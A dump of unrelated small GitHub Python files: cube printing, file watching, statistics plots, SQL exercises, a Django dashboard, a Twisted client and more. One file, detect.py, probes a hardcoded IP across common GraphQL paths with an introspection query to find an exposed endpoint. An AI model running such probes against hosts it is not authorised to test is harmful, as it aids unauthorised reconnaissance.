{lst[idx][5][0]}{lst[idx][5][1]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][4][2]}{lst[idx][4][3]} {lst[idx][2][2]}{lst[idx][2][3]} {lst[idx][1][2]}{lst[idx][1][3]} {lst[idx][5][2]}{lst[idx][5][3]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][3][0]}{lst[idx][3][1]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][3][2]}{lst[idx][3][3]}\",end=\" \")\n print(end=\"\\n\\n\")\n # if length > 1:\n # for idx in range(length-1):\n # if idxLst is not len(listCubes)-1 and idx >= len(listCubes[idxLst+1]):\n # print(\"-\"*13,end=\"-\")\n # else:\n # print(\"-\"*13,end=\"+\")\n # print(\"-\"*13+\"|\")","repo_name":"satwikShresth/Rubiks_2x2x2_solver","sub_path":"Cube.py","file_name":"Cube.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"1451850326","text":"import sys\nimport time\nimport logging\nfrom watchdog.observers import Observer\nfrom watchdog.events import *\nimport jieba\n\ndef fenci(filepath):\n f=open(filepath,\"r\")\n fn=open(\".\"+filepath,'a+')\n for line in f.readlines():\n seg_list = jieba.cut(line, cut_all=False)\n s= \"/ \".join(seg_list)\n fn.write(s)\n fn.close()\n f.close()\n print('end')\n\n\nclass FileEventHandler(FileSystemEventHandler):\n def __init__(self):\n FileSystemEventHandler.__init__(self)\n\n def on_moved(self, event):\n if event.is_directory:\n print(\"directory moved from {0} to {1}\".format(event.src_path,event.dest_path))\n else:\n print(\"file moved from {0} to {1}\".format(event.src_path,event.dest_path))\n\n def on_created(self, event):\n if event.is_directory:\n print(\"directory created:{0}\".format(event.src_path))\n else:\n fenci(event.src_path)\n print(\"file created:{0}\".format(event.src_path))\n\n def on_deleted(self, event):\n if event.is_directory:\n print(\"directory deleted:{0}\".format(event.src_path))\n else:\n print(\"file deleted:{0}\".format(event.src_path))\n\n def on_modified(self, event):\n if event.is_directory:\n print(\"directory modified:{0}\".format(event.src_path))\n else:\n print(\"file modified:{0}\".format(event.src_path))\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n path = '.'\n event_handler = FileEventHandler()\n observer = Observer()\n observer.schedule(event_handler, path, recursive=True)\n observer.start()\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()\n","repo_name":"SizzleWang/AscEndS","sub_path":"watchdog.py","file_name":"watchdog.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"27470418028","text":"# Cezary Świtała\n# Kod użyty do generowania wykresów\n# pojawiających się w sprawozdaniu.\n\nfrom fisher import * # import własnych metod przydatnych przy wyliczaniu wartośći \n# funkcji gęstości rozkładu fishera\nimport math\nimport numpy\nimport matplotlib.pyplot as pyplot\n\ndef map_list(f, x): \n return list(map(f,x))\n\nx = numpy.linspace(0.001,4,num=200)\n\nfisher_1_1 = get_fisher_distr_density_function(1,1)\nfisher_2_1 = get_fisher_distr_density_function(2,1)\nfisher_4_1 = get_fisher_distr_density_function(4,1)\nfisher_4_2 = get_fisher_distr_density_function(4,2)\nfisher_4_4 = get_fisher_distr_density_function(4,4)\nfisher_6_4 = get_fisher_distr_density_function(6,4)\n\npyplot.plot(x, map_list(fisher_1_1, x), label=\"m=1,n=1\")\npyplot.plot(x, map_list(fisher_2_1, x), label=\"m=2,n=1\", color=\"red\")\npyplot.plot(x, map_list(fisher_4_1, x), label=\"m=4,n=1\", color=\"black\")\npyplot.plot(x, map_list(fisher_4_2, x), label=\"m=4,n=2\", color=\"green\")\npyplot.plot(x, map_list(fisher_4_4, x), label=\"m=4,n=4\", color=\"orange\")\npyplot.plot(x, map_list(fisher_6_4, x), label=\"m=6,n=4\", color=\"purple\")\npyplot.axis([0,4,0,1.5])\npyplot.legend()\npyplot.show()\npyplot.clf()\n\nfisher_1_1_cumulative = get_cumulative_fisher_distr(1,1,13);\nfisher_2_1_cumulative = get_cumulative_fisher_distr(2,1);\nfisher_4_1_cumulative = get_cumulative_fisher_distr(4,1);\nfisher_4_2_cumulative = get_cumulative_fisher_distr(4,2);\nfisher_4_4_cumulative = get_cumulative_fisher_distr(4,4);\nfisher_6_4_cumulative = get_cumulative_fisher_distr(6,4);\n\npyplot.plot(x, map_list(fisher_1_1_cumulative, x), label=\"m=1,n=1\")\npyplot.plot(x, map_list(fisher_2_1_cumulative, x), label=\"m=2,n=1\", color=\"red\")\npyplot.plot(x, map_list(fisher_4_1_cumulative, x), label=\"m=4,n=1\", color=\"black\")\npyplot.plot(x, map_list(fisher_4_2_cumulative, x), label=\"m=4,n=2\", color=\"green\")\npyplot.plot(x, map_list(fisher_4_4_cumulative, x), label=\"m=4,n=4\", color=\"orange\")\npyplot.plot(x, map_list(fisher_6_4_cumulative, x), label=\"m=6,n=4\", color=\"purple\")\npyplot.axis([0,4,0,1])\npyplot.legend()\npyplot.show()","repo_name":"MusicFreak456/Uniwroc","sub_path":"SemestrIV/RPiS/Pracownia/1/charts.py","file_name":"charts.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"36889730166","text":"#!/usr/bin/env python3.7\n\nimport zoo_diversity_analysis\n\nimport re,glob,argparse\n\nparser = argparse.ArgumentParser(description=\"Process a shorah read file to filter and calculate the average number of polymorphic sites\\n\")\nessentialArgs = parser.add_argument_group('Files', 'Required arguments')\nessentialArgs.add_argument('-i','--input',metavar='input',required=True,type=str,dest='shorah_input',help=\"The reads.fas output file from ShoRAH\")\nessentialArgs.add_argument('-o','--output',metavar='output',required=True,type=str,dest='output_file',help=\"The file to print the results to\")\n#essentialArgs.add_argument('-r','--reference',metavar='reference',required=True,type=str,dest='reference_file',help=\"The file containing the reference sequence used in ShoRAH\")\nnonEssentialArgs = parser.add_argument_group('Conditions','Optional arguments')\n\nnonEssentialArgs.add_argument('-l','--pipeline-shorah',metavar='shorah',required=False,type=bool,dest='shorah',help=\"A boolean to indicate if the input is from the shorah pipeline, by default this is False.\")\nnonEssentialArgs.add_argument('-d','--directory',metavar='directory',required=False,type=bool,dest='input_is_directory',help=\"A boolean to indicate if the input is a directory or not, by default this is False.\")\nnonEssentialArgs.add_argument('-c','--continuous-mismatches',metavar='continuous',required=False,type=int,dest='contiguous_filter',help=\"The number of consecutive mismatches after which a particular read should be dropped.\")\nnonEssentialArgs.add_argument('-C','--minimum-predicted-coverage',metavar='coverage',required=False,type=float,dest='coverage',help=\"The average number of expected read coverages for the predicted local haplotypes.\")\nnonEssentialArgs.add_argument('-p','--minimum-sequence-posterior-probability',metavar='min_prob',required=False,type=float,dest='min_prob',help=\"The required posterior probability for the predicted local haplotypes.\")\nnonEssentialArgs.add_argument('-f','--identity-filter',metavar='identity',required=False,type=float,dest='identity',help=\"The required number of matches for a read to be included.\")\nnonEssentialArgs.add_argument('-M','--mega_output',metavar='MEGA',required=False,type=str,dest='MEGA',help=\"A prefix for outputing reads in short local alignments for subsequent analysis.\")\n# NOTE the following two arguments are dealt with here\nnonEssentialArgs.add_argument('-s','--input-files-suffix',metavar='input_suffix',required=False,type=str,dest='input_suffix',help=\"The suffix, or extension for the files that are to be used as input, by default .fas.\")\nnonEssentialArgs.add_argument('-O','--merge-output',metavar='merge_output',required=False,type=bool,dest='merge_output',help=\"A boolean to indicate whether the output should be merged or not, either True or False (default).\")\nnonEssentialArgs.add_argument('-w','--window-length',metavar='window_length',required=False,type=int,dest='window_length',help=\"The length of the windows to be used (by default 66).\")\nnonEssentialArgs.add_argument('-W','--wattersons-statistic',metavar='wattersons_statistic',required=False,type=bool,dest='wattersons_statistic',help=\"A boolean to indicate whether to use wattersons theta (True), or pi (if -W is not provided, default)\")\nnonEssentialArgs.add_argument('-N','--minimum-no-haplotypes',metavar='minimum_haplotypes',required=False,type=int,dest='minimum_haplotypes',help=\"The minimum required number of haplotypes for the diversity analysis to ve performed (default 2)\")\n\narguments = parser.parse_args()\n\n# use the input_is_directory argument to either find the files, or to use the input argument directly\n\nif arguments.input_suffix is None:\n arguments.input_suffix = \".fas\"\nif arguments.merge_output is None:\n arguments.merge_output = False\nif arguments.input_is_directory is None:\n arguments.input_is_directory = False\nif arguments.shorah is None:\n arguments.shorah = False\nif arguments.wattersons_statistic is None:\n arguments.wattersons_statistic = False\n\nif arguments.minimum_haplotypes is None:\n arguments.minimum_haplotypes = 2\n\n\nif arguments.contiguous_filter is None:\n arguments.contiguous_filter = 10\nif arguments.min_prob is None:\n arguments.min_prob = 0.95\nif arguments.identity is None:\n arguments.identity = 0.95\nif arguments.coverage is None:\n arguments.coverage = 0\nif arguments.input_suffix is None:\n arguments.input_suffix = \"\"\nif arguments.merge_output is None:\n arguments.merge_output = False\nif arguments.window_length is None:\n arguments.window_length = 66\n\n\n\n\nif arguments.input_is_directory:\n file_list = glob.glob(arguments.shorah_input + \"/*\" + arguments.input_suffix)\n for aFile in file_list:\n if arguments.merge_output:\n output = open(arguments.output_file,\"a\")\n zoo_diversity_analysis.main(aFile,output,arguments.contiguous_filter,arguments.identity,arguments.MEGA,arguments.window_length,arguments.wattersons_statistic,arguments.coverage,arguments.min_prob,arguments.minimum_haplotypes,arguments.shorah)\n else:\n exp = re.compile(r\".*/(.*)\\.\\w+$\")\n excludingExtension = re.match(exp,aFile)\n theFile = excludingExtension.group(1) + arguments.output_file\n output = open(theFile,\"w\")\n zoo_diversity_analysis.main(aFile,output,arguments.contiguous_filter,arguments.identity,arguments.MEGA,arguments.window_length,arguments.wattersons_statistic,arguments.coverage,arguments.min_prob,arguments.minimum_haplotypes,arguments.shorah)\nelse:\n output = open(arguments.output_file,\"a\")\n zoo_diversity_analysis.main(arguments.shorah_input,output,arguments.contiguous_filter,arguments.identity,arguments.MEGA,arguments.window_length,arguments.wattersons_statistic,arguments.coverage,arguments.min_prob,arguments.minimum_haplotypes,arguments.shorah)\n","repo_name":"Zoophobus/diversity","sub_path":"zoo_diversity.py","file_name":"zoo_diversity.py","file_ext":"py","file_size_in_byte":5815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"28192233802","text":"from sqlalchemy.ext.asyncio import AsyncSession\n\nfrom models.base_engine import Model, RecordTimestampFields\nimport sqlalchemy as sa\n\nfrom models.db_models import User\nfrom models.enums import CoinValueChangeEnum\n\n\nclass ActionsEconomy(Model, RecordTimestampFields):\n __tablename__ = \"actions_economy\"\n\n id = sa.Column(sa.Integer, primary_key=True, autoincrement=True)\n action_name = sa.Column(sa.String, nullable=False)\n description = sa.Column(sa.Text)\n change_type: CoinValueChangeEnum = sa.Column(sa.String, nullable=False)\n change_amount = sa.Column(sa.Integer, nullable=False, server_default=\"0\")\n\n @classmethod\n async def execute(\n cls,\n session: AsyncSession,\n action_name: str,\n coin_receiver_user_id: int,\n ):\n\n action = (\n await session.execute(\n sa.select(\n ActionsEconomy.action_name,\n ActionsEconomy.change_type,\n ActionsEconomy.change_amount,\n ).where(ActionsEconomy.action_name == action_name)\n )\n ).fetchone()\n\n user_coins = (\n (\n await session.execute(\n sa.select(User.coins).where(User.id == coin_receiver_user_id)\n )\n )\n .fetchone()\n .coins\n )\n\n if action.change_type == \"EARN\":\n new_coin_value = user_coins + action.change_amount\n sign = \"\"\n else:\n new_coin_value = user_coins - action.change_amount\n sign = \"-\"\n if new_coin_value < 0:\n raise cls.InsufficientCoins(\"Not enough coins\")\n\n await session.execute(\n sa.update(User)\n .where(User.id == coin_receiver_user_id)\n .values({User.coins: new_coin_value})\n )\n\n return {\n \"change_amount\": f\"{sign}{action.change_amount}\",\n \"coins\": new_coin_value,\n }\n\n @staticmethod\n async def verify_possibility(\n session: AsyncSession,\n user_id: int,\n action_names: list\n | None = None, # if there is no action names - then check all\n ):\n actions = (\n await session.execute(\n sa.select(\n ActionsEconomy.action_name,\n ActionsEconomy.change_type,\n ActionsEconomy.change_amount,\n )\n )\n ).fetchall()\n user_wallet = (\n (await session.execute(sa.select(User.coins).where(User.id == user_id)))\n .fetchone()\n .coins\n )\n if not action_names:\n action_names = [action.action_name for action in actions]\n always_true = {\n action.action_name: True\n for action in actions\n if all(\n [\n action.action_name in action_names,\n action.change_type == CoinValueChangeEnum.EARN,\n ]\n )\n }\n possibilities = {\n action.action_name: (user_wallet - action.change_amount) > 0\n for action in actions\n if all(\n [\n action.action_name in action_names,\n action.change_type == CoinValueChangeEnum.SPEND,\n ]\n )\n }\n return {**always_true, **possibilities}\n","repo_name":"MajorXaker/showmeplace-api","sub_path":"models/db_models/economy.py","file_name":"economy.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"26357661872","text":"#!/usr/bin/env python\nnum = int(input())\nheights = [0] + [int(x) for x in input().split()] + [0]\ncnt = 0\nup = heights[0] < heights[1]\nfor i in range(num + 1):\n if up and heights[i] > heights[i + 1]:\n cnt += 1\n up = False\n if not up and heights[i] < heights[i + 1]:\n # cnt += 1\n up = True\nprint(cnt)\n","repo_name":"aLagoG/kygerand","sub_path":"rpc/1/h.py","file_name":"h.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"18443719686","text":"#!/usr/bin/python3\n\"\"\"This script adds the State object “Louisiana” to\nthe database hbtn_0e_6_usa\"\"\"\n\nimport sqlalchemy\nfrom model_state import Base, State\nfrom sqlalchemy import create_engine\nfrom sys import argv\nfrom sqlalchemy.orm import sessionmaker\n\n\nif __name__ == \"__main__\":\n \"\"\"to be accessed directly for MetaData-specific operations.\"\"\"\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'.format(\n argv[1], argv[2], argv[3]), pool_pre_ping=True)\n\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n\n new_state = State(name='Louisiana')\n session.add(new_state)\n query = session.query(State).filter_by(name='Louisiana').first()\n print(new_state.id)\n session.commit()\n session.close()\n","repo_name":"EylenS/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/11-model_state_insert.py","file_name":"11-model_state_insert.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"2696228253","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 11 14:54:55 2022\r\n\r\n@author: Sam\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport numpy as np\r\n#sediment flow parameters\r\nq0=0.22; a=1.1; \r\n#bed shape parameters\r\nb=0.2; k=2.0; eps=0.5; #bed porosity not given so I'll assume 0.5\r\n#space domain\r\nxdelta=0.1;\r\nstart=0.0; end=4.0;\r\nx=np.arange(start, end+xdelta,xdelta)\r\n#time domain\r\ntdelta=[0.05,0.1,0.15]\r\n#clear figures\r\nplt.cla(); plt.clf();\r\n#setup\r\nn=[];\r\nplt.style.use(\"dark_background\");\r\nfig, ax= plt.subplots(figsize=[4.8, 3.6],dpi=300);\r\n# initial conditions plot\r\nn.append(b*np.sin(k*x));\r\nax.plot(x,n[0],label=\"t=0\");\r\n# different time delta plots\r\nfor i in range(len(tdelta)):\r\n n.append( b*np.sin(k*x)-tdelta[i]*(a*b*k/eps)*np.cos(k*x) );\r\n ax.plot(x,n[i+1],label=\"$\\Delta t=$\"+str(tdelta[i]));\r\n# style of the plot\r\nax.set_xlabel(\"location (m)\");\r\nax.set_ylabel(\"bed elevation (m)\");\r\nax.legend();\r\nax.grid(True);\r\nplt.show();\r\n#now with a plot of the flow on top\r\nplt.style.use(\"default\");\r\nfig2, ax2= plt.subplots(figsize=[4.8, 3.6],dpi=300);\r\nax2.plot(x,n[0],label=\"$\\eta (x)$\",zorder=0);\r\ny_dummy=x*0;\r\nq=q0+a*n[0];\r\nax2.quiver(x,n[0],q,y_dummy,zorder=1);\r\n\r\n# style of the plot\r\nax2.set_xlabel(\"location (m)\");\r\nax2.set_ylabel(\"bed elevation (m)\");\r\nax2.set_title(\"flux $q_s$ on surface\");\r\nax2.legend();\r\nax2.grid(True);\r\nplt.show();","repo_name":"y05emite-sam/dep_mechanics","sub_path":"hw1/problem1.3.py","file_name":"problem1.3.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"12633228072","text":"\"\"\"\nMedian of two sorted arrays\nGiven two sorted arrays nums1 and nums2 of size m and n respectively, return the median of the two sorted arrays.\n\nThe overall run time complexity should be O(log (m+n)).\n\n@Author: Venkat Rebba \n\"\"\"\nclass Solution:\n def findMedianSortedArrays(self, nums1, nums2):\n \n l1 = len(nums1)\n l2 = len(nums2)\n nums3 = []\n \n i, j, k = 0, 0, 0\n \n while True:\n \n if i>=l1 or j>=l2:\n break\n \n if nums1[i] >= nums2[j]:\n nums3.append(nums2[j])\n j += 1\n \n else:\n nums3.append(nums1[i])\n i += 1\n \n k += 1\n \n if l1-i > 0:\n nums3.extend(nums1[i:])\n \n if l2-j > 0:\n nums3.extend(nums2[j:])\n \n \n m = len(nums3)//2 \n med = nums3[m] if (len(nums3)%2 == 1) else (nums3[m-1] + nums3[m])/2\n return med\n \n \nn1 = [1,2,3]\nn2 = [2, 4, 5]\n\nsol = Solution()\nprint(sol.findMedianSortedArrays(n1, n2))\n ","repo_name":"venkatrebba/Leetcode_practice","sub_path":"meanOfTwoSortedArrays.py","file_name":"meanOfTwoSortedArrays.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"42511827564","text":"#!/usr/bin/python3\n\"\"\"\nMy Safe Filter States Module\n\"\"\"\nimport MySQLdb\nimport sys\n\n\nargv = sys.argv\nif argv.__len__() == 5:\n ALX_DB_DETAIL = {\n 'host': \"localhost\",\n 'port': 3306,\n 'user': argv[1],\n 'passwd': argv[2],\n 'db': argv[3]\n }\n search_n = argv[4]\n db = MySQLdb.connect(**ALX_DB_DETAIL)\n cursor = db.cursor()\n query = \"\"\"SELECT cities.name\n FROM cities\n JOIN states ON cities.state_id = states.id\n WHERE states.name = %s\n ORDER BY cities.id ASC;\"\"\"\n cursor.execute(query, (search_n,))\n records = cursor.fetchall()\n my_list = [x[0] for x in records]\n print(\", \".join(my_list))\n \"\"\" record_count = cursor.rowcount\n for i in range(0, record_count):\n if i == record_count-1:\n print(cursor.fetchone()[0])\n else:\n print(cursor.fetchone()[0], end=', ')\"\"\"\n cursor.close()\n db.close()\n","repo_name":"NiiAdjei-001/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"26398644087","text":"import json\r\nimport requests\r\nfrom urllib import parse\r\n\r\npaths = [\r\n \"\",\r\n \"/graphql\",\r\n \"/graphql/console\",\r\n \"graphql.php\",\r\n \"graphiql\",\r\n \"explorer\",\r\n \"altair\",\r\n \"/playground\"\r\n]\r\n\r\nquery = \"\"\"{\r\n __schema {\r\n types {\r\n name\r\n }\r\n }\r\n}\r\n\"\"\"\r\n\r\nfor path in paths:\r\n hostname = 'http://159.100.248.211'\r\n endpoint = parse.urljoin(hostname, path)\r\n try:\r\n print(f\"Attempt: {endpoint}\")\r\n response = requests.post(endpoint, json={'query': query}, timeout=0.1)\r\n except Exception:\r\n print(\"No GraphQL endpoint found\")\r\n else:\r\n if response.status_code == 200:\r\n json_data = json.loads(response.text)\r\n if json_data.get('data'):\r\n print(\"It is a GraphQL endpoint\",endpoint)\r\n","repo_name":"MarkDan101/graphdetect","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"34501634182","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport sys\nimport rospy\nfrom beginner_tutorials.srv import *\n\ndef Celsius2Fahrenheit_client(x):\n rospy.wait_for_service('C2F')\n try:\n C2FF = rospy.ServiceProxy('C2F', Celsius2Fahrenheit)\n return C2FF(x)\n except rospy.ServiceException as e:\n print(\"Service call failed: %s\"%e)\n\ndef usage():\n return \"%s [x]\"% float(sys.argv[0])\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n x = float(sys.argv[1])\n Celsius2Fahrenheit_client(x)\n else:\n print(usage())\n sys.exit(1)\n print(\"Requesting %s\"%(x))\n var=x*1.8+32\n print(str(x)+\" Celsius degrees is \" + str(var) + \" Fahrenheit degrees\")\n \n","repo_name":"I1C/TemperatureConverterClientServer","sub_path":"scripts/Celsius2Fahrenheit_client.py","file_name":"Celsius2Fahrenheit_client.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"33610794945","text":"from styles import *\r\nfrom ventanaViaje import *\r\nfrom ventanaEmpresa import *\r\nfrom ventanaChoferes import *\r\n\r\nclass VentanaPrincipal(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.setWindowTitle(\"Remiseria\")\r\n self.mainLayout = QVBoxLayout()\r\n \r\n self.titulo = Text(string=\"Bienvenido a Empresa de Jhoskin\", fontF=\"Cambria\", fontS=20)\r\n self.mainLayout.addWidget(self.titulo)\r\n \r\n self.botonViaje = Button(string=\"Nuevo Viaje\", fontF=\"Cambria\", fontS=20)\r\n self.mainLayout.addWidget(self.botonViaje)\r\n self.botonViaje.clicked.connect(self.abrirVentanaViaje)\r\n \r\n self.botonEmpresa = Button(string=\"Empresa\", fontF=\"Cambria\", fontS=20)\r\n self.mainLayout.addWidget(self.botonEmpresa)\r\n self.botonEmpresa.clicked.connect(self.abrirVentanaEmpresa)\r\n \r\n self.botonChoferes = Button(string=\"Choferes\", fontF=\"Cambria\", fontS=20)\r\n self.mainLayout.addWidget(self.botonChoferes)\r\n self.botonChoferes.clicked.connect(self.abrirVentanaChoferes)\r\n\r\n centralWidget = QWidget()\r\n centralWidget.setLayout(self.mainLayout)\r\n self.setCentralWidget(centralWidget)\r\n \r\n def abrirVentanaViaje(self):\r\n self.windowViaje = WindowViaje()\r\n self.windowViaje.show()\r\n\r\n def abrirVentanaEmpresa(self):\r\n self.windowEmpresa = WindowEmpresa()\r\n self.windowEmpresa.show()\r\n \r\n def abrirVentanaChoferes(self):\r\n self.windowChoferes = WindowChoferes()\r\n self.windowChoferes.show()\r\n \r\nif __name__ == '__main__':\r\n app = QApplication()\r\n window = VentanaPrincipal()\r\n window.setStyleSheet(\"background-color: darkgray\")\r\n window.show()\r\n app.exec()","repo_name":"pablokan/side","sub_path":"efis/B/nine/proyecto/ventanaPrincipal.py","file_name":"ventanaPrincipal.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"9263376454","text":"from __future__ import print_function\nimport time\nfrom schedule import Heap\nimport plugins\nfrom twisted.internet import reactor,protocol,endpoints,task\nfrom twisted.protocols.basic import LineReceiver\n\n__author__ = 'wstevens'\n\nclass IntercomProtocol(LineReceiver):\n\n def check(self):\n if not self.factory.heap.empty():\n run_time, cmd = self.factory.heap.peek()\n if run_time <= time.time():\n self.factory.heap.pop()\n cmd.act()\n\n def connectionMade(self):\n print(\"Connected successfully\")\n c = task.LoopingCall(self.check)\n c.start(5.0)\n\n def lineReceived(self, line):\n if line:\n parts = line.decode('utf-8','ignore').split(\"|\")\n if len(parts) >= 2:\n parts[0]=' '.join(parts[:-1])\n parts[1]=parts[-1]\n print(parts[1],\"New Message Recieved: \",parts[0])\n sc = plugins.command.SayCommand(parts[0])\n self.factory.heap.push(float(parts[1]), sc)\n \n\nclass IntercomClientFactory(protocol.ClientFactory):\n protocol = IntercomProtocol\n heap = Heap()\n\n def clientConnectionFailed(self, connector, reason):\n print('connection failed:', reason.getErrorMessage())\n time.sleep(5)\n connector.disconnect()\n connector.connect()\n \n def clientConnectionLost(self, connector, reason):\n print('connection lost:', reason.getErrorMessage())\n connector.disconnect()\n connector.connect()\n\n def buildProtocol(self, addr):\n p = self.protocol()\n p.factory = self\n return p\n\ntry:\n with open('server.key.txt') as f:\n server = f.read().strip()\nexcept Exception:\n server = 'localhost'\n\nconnector = reactor.connectTCP(server, 42124, IntercomClientFactory())\nprint('connecting to:',server)\nreactor.run()\n\n","repo_name":"wasv/intercom","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"}
+{"seq_id":"37128524240","text":"import json\nimport random\nfrom datetime import datetime, timedelta\n\nfrom django.db.models import Sum, Avg, Max\nfrom django.shortcuts import render\nfrom rest_framework.authtoken.models import Token\n\nfrom .models import UserData, Profile\n\n\ndef home_page(request):\n return render(request, 'Data/home_page.html', context={})\n\n\ndef ranking(request):\n # User token:\n # ----------------------------------------------------\n token = Token.objects.get(user=request.user) if request.user.is_authenticated else None\n\n # Best Contributors table:\n # ----------------------------------------------------\n\n # Get best first 25 contributors from db\n best_friends = Profile.objects.order_by('-score')[:25]\n\n # Format data to json for frontend\n bffs = [{'user': profile.user, 'score': profile.score, 'position': i + 1} for i, profile in enumerate(best_friends)]\n\n # Graph data:\n # ----------------------------------------------------\n\n # Creating list of days of this week\n days_this_week = []\n today = datetime.today().date()\n for i in range(8):\n date = (today + timedelta(days=-i))\n days_this_week.append(str(date))\n\n # Creating list of scores from this week\n score_this_week = []\n for i in range(8):\n score = sum([obj.score for obj in\n UserData.objects.filter(uploaded_at__date=datetime.today().date() - timedelta(days=i))])\n score_this_week.append(score)\n\n # Zipping scores and dates into one dict\n data = dict(zip(days_this_week, score_this_week))\n\n # Progress Bar data:\n # ----------------------------------------------------\n score_sum = Profile.objects.aggregate(Sum('score'))['score__sum']\n score_sum = score_sum if score_sum is not None else 0\n\n # Percent of individual help\n total_time_played = round(score_sum / 3600, 2)\n if request.user.is_authenticated and score_sum > 0:\n help_percent = round(100 * (Profile.objects.get(user=request.user).score) / score_sum, 1)\n else:\n help_percent = 0\n\n # Data Submitted:\n # ----------------------------------------------------\n if request.user.is_authenticated:\n uploads = UserData.objects.filter(user=request.user).order_by('-uploaded_at')\n\n user_data = []\n for upload in uploads:\n date = upload.uploaded_at.strftime('%Y-%m-%d %H:%M:%S')\n user_data.append({\"score\": upload.score, \"id\": upload.id, \"uploaded_at\": date})\n\n else:\n user_data = {}\n\n # Number of users:\n # ----------------------------------------------------\n n_users = Profile.objects.all().count()\n\n # Average number of frames per user\n # ----------------------------------------------------\n avg_user_score = Profile.objects.aggregate(Avg('score'))['score__avg']\n avg_user_score = round(avg_user_score) if avg_user_score is not None else 0\n\n # Average number of sessions per user\n # ----------------------------------------------------\n avg_session_score = UserData.objects.aggregate(Avg('score'))['score__avg']\n avg_session_score = round(avg_session_score) if avg_session_score is not None else 0\n\n avg_session_time = round(avg_session_score / 60, 2) if avg_session_score is not None else 0\n\n # Top 3 users\n # ----------------------------------------------------\n top_3_score_sum = Profile.objects.order_by('-score')[:3].aggregate(Sum('score'))['score__sum']\n if top_3_score_sum is not None and score_sum > 0:\n top_3_score_percent = round(100 * top_3_score_sum / score_sum, 2)\n else:\n top_3_score_percent = 0\n\n # Longest fishing session\n # ----------------------------------------------------\n max_score = UserData.objects.aggregate(Max('score'))['score__max']\n max_score_users = UserData.objects.filter(score=max_score)\n\n if max_score_users is not None and max_score is not None:\n rand_user = random.randint(0, len(max_score_users) - 1)\n\n max_score_user = [user for user in max_score_users][rand_user]\n time = round(max_score / 60, 1)\n else:\n max_score = 0\n max_score_user = 'admin'\n time = 0\n\n longest_session_dict = {'max_score': max_score, 'user': max_score_user, 'time': time}\n\n return render(request, 'Data/dashboard.html', context={\n\n 'bffs_dict': bffs,\n 'data': json.dumps(data),\n 'score_sum': score_sum,\n 'total_time_played': total_time_played,\n 'user_data': user_data,\n 'help_percent': help_percent,\n 'n_users': n_users,\n 'avg_user_score': avg_user_score,\n 'avg_session_score': avg_session_score,\n 'avg_session_time': avg_session_time,\n 'top_3_score_percent': top_3_score_percent,\n 'longest_session': longest_session_dict,\n 'token': token\n })\n","repo_name":"Setti7/Stardew-Web","sub_path":"Data/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
+{"seq_id":"15062741986","text":"import requests\n\n\n\nurl = \"https://httpbin.org/get\"\n\nargs = {\n \"nombre\":\"Juan\",\n \"curso\":\"python\",\n \"nivel\":\"intermedio\"\n }\n\nresponse = requests.get(url,params=args)\n\nprint(response.url)\n\nif response.status_code == 200:\n print(response.content)","repo_name":"AlexOlivaresP/CifradorFLASK","sub_path":"ejemploe/uno.py","file_name":"uno.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
